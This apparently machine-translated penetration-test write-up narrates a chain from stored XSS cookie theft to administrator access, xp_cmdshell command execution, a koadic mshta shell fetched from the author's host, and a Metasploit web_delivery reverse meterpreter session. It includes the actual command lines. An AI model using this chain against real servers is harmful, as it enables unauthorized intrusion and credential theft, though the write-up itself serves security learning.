Shulou(Shulou.com)05/31 Report--

In this article, the editor introduces in detail "case analysis of server permission penetration test". The content is detailed, the steps are clear, and the details are handled properly. I hope this "case analysis of server authority penetration test" article can help you solve your doubts. Let's follow the editor's ideas to learn new knowledge.

XSS

Speaking of XSS, many testers often just type in some simple payload to prove it (I did the same before), but through this article, we may not just pop a window to prove the existence of its XSS vulnerability in the future.

Google syntax

Looking for a starting point

The idea of infiltration is to collect information first, but this time only getshell or access to the server is given a score, such as general XSS,csrf, weak password is not counted, even if you get to the background but without getshell, it is not counted.

In this case, I usually look for upload points, through Google syntax search, site: subdomain name + intitle: registration / login / system to find a place where I can register or log in.

After the successful registration, it is found that there is a XSS loophole in the personal information. The usual test is to let the pop-up window prove it. I do not want to do something through XSS.

Because of the ID card upload function, I first bypassed the upload point, but after trying various methods, I found that it was not successful, so I gave up the upload point and began to carefully examine the website, and found that it was necessary for the administrator to review and review the personal information submitted here, while there was a storage XSS, so why not take a chance to hit the administrator's cookie?

So insert XSSpayload here and then go out to eat and wait for the results.

I didn't expect that my face was really white today. When I was having dinner, I found that the mailbox where XSS called the administrator's cookie message had popped up on my phone. I didn't have to eat and immediately went back to the computer to continue to do it.

XSS hit the background blindly.

After the visit, you successfully entered the background as an administrator by replacing cookie with the EditThisCookie plug-in on chrome, but found that the page you entered is similar to a static page, in which you can only see some information and no other functions:

I thought, no, since the administrator wants to audit my user information, there must be an audit interface, and then I think of the same origin policy of the browser.

The same origin policy of the browser

Definition of homology: if the protocol, port, and host of two pages are the same, then both pages have the same source.

Cookie: only homologous web pages can be shared, but if the first-level domain names of the two pages are the same, but the second-level domain names are different, then browsers can share Cookie by setting document.domain.

Homologous strategy

Sure enough, through the same origin strategy, we successfully entered the background of the administrator.

The first thing to do backstage: find the upload point! Equally fruitless, we can only see if there are any other breakthroughs. Finally found a place in the content management office where sql statements can be executed.

Since the SQL statement can be executed, it must be without our commonly used command xp_cmdshell. Through the successful execution of the command exec master..xp_cmdshell 'powershell whoami', we know that the server permission is system permission.

The next task is to bounce shell to our MSF. But found that powershell rebounded shell can not bounce back, but come to this point can not give up, after all, I want to enter their intranet to shit the man.

At this time asked the company boss, the boss said that you can use koadic to have a try.

The use of koadic

I found that there was no introduction to koadic in the community before, so I would like to mention a few words here.

Koadic is a post-penetration tool released on DEFCON, similar to msf, but Koadic does most of its operations through the use of Windows ScriptHost (also known as JScript / VBScript), its core compatibility supports Windows2000 to Window 10 environments, and Koadic also tries to be compatible with Python 2 and Python 3.

Set IP and port for local listening.

The mshta http://ip/XXXX generated by koadic successfully bounced back to koadic via xp_cmdshell.

Monitoring succeeded:

Cmdshell 0-- > enter cmd command mode

In fact, koadic can also be used for follow-up operations, such as lifting rights, grabbing passwords, etc., but we are not very familiar with some of the features of koadic, so here we still choose to use the artifact of MSF, which we are most familiar with. (blow up MSFF! -. -)

Koadic to shell to MSF

Now that we can execute the CMD command in koadic, we just need to transfer shell to msf.

Open MSF: msfconsole

Use the web_delivery module

Use exploit/multi/script/web_delivery

Set up the payload:

Set payload windows/x64/meterpreter/reverse_tcp_rc4

Set SRVPORT 8081

Set lhost XX.XX.XX.XXX

Because we have previously listened through koadic, and koadic and MSF are on my server, we can set it to the attacker's intranet IP address.

Check the private network ip:

Set reverselistenerbindaddress 172.xx.xx.182

Run

Generate a powershell.exe

Successfully transfer shell to our MSF after koadic executes exe

Sessions received successfully

Seeing the familiar meterpreter module is really tearful!

Because the permissions of the server are directly system permissions, there is no need to mention rights, just when I want to continue the horizontal rush of the host of the intranet, I found an important problem: no domain!

After reading this, the article "case Analysis of Server permission Penetration Test" has been introduced. If you want to master the knowledge points of this article, you still need to practice and use it yourself to understand it. If you want to know more about related articles, welcome to follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.